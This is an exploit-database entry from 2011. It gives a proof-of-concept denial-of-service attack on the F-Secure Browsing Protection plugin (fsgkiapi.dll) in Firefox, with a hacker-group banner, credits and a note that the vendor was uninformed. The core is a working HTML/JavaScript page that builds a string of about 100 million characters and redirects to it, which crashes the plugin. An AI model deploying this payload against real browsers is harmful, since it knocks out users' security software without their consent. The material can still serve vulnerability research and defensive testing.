F-secure Browsing Protection (fsgkiapi.dll) Plugin Terminate POC

2011-08-16T00:00:00
ID 1337DAY-ID-16679
Type zdt
Reporter SeeMe
Modified 2011-08-16T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            ==================================================================
 F-secure Browsing Protection (fsgkiapi.dll) Plugin Terminate POC
==================================================================

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0     _                   __           __       __                     1
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
#1                  \ \____/ >> Exploit database separated by exploit   0
#0                   \/___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0  [+] Site            : 1337day.com                                   0
#1  [+] Support e-mail  : submit[at]1337day.com                         1
#0                                                                      0
#1                    ####################################              1
#0                    I'm SeeMe  member from Inj3ct0r Team              1
#1                    ####################################              0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[-] F-secure Browsing Protection (fsgkiapi.dll) Plugin Terminate POC
[-] Application : F-secure Browsing Protection
[-] Version : 1.10 / Plugin 9.93
[-] Date 09/Aug/2011
[-] App Homepage : http://www.f-secure.com
[-] Tested on : Mozilla Firefox 5.0 / OS WIN 7-xp
[-] Vendor Status : Uninformed
[-] Vulnerability discovered by SeeMe 
[-] special shouts goes to : r0073r (1337day.com)
[-] L0rd CruSad3r, Th3 RDX, KnocKout
[-] Sid3^effects, Gunslinger_, The Explo!ted
[-] Eidelweiss, Exploit-id team
[-] ZoRLu, Indoushka, Dev-PoinT.com Team Specialy anT!-Tr0J4n
[-] SeeMe WILL BE BACK SOON TO CODE SOME SHIT

----------------
~ fsgkiapi.dll
~ 9.93.16394.20
~ 4c98aa05
~ 40000015
~ 0000f3af
----------------

[-] The app will request the Runtime to terminate it

==================
 Proof of Concept  
==================

<html>
<head>

<script type="text/javascript">

function exp (str, num) {
	if (!num) return "";
	var	orig = str,
		soFar = [str],
		added = 1,
		left, i;
	while (added < num) {
		left = num - added;
		str = orig;
		for (i = 2; i < left; i *= 2) {
			str += str;
		}
		soFar.push(str);
		added += (i / 2);
	}
	return soFar.join("");

}

var junka = "a";

var junk = exp(junka,99999999);


window.location.href = "http://" + junk;


</script>
</head>

<body>

</body>
</html>

#_END_



#  0day.today [2018-01-01]  #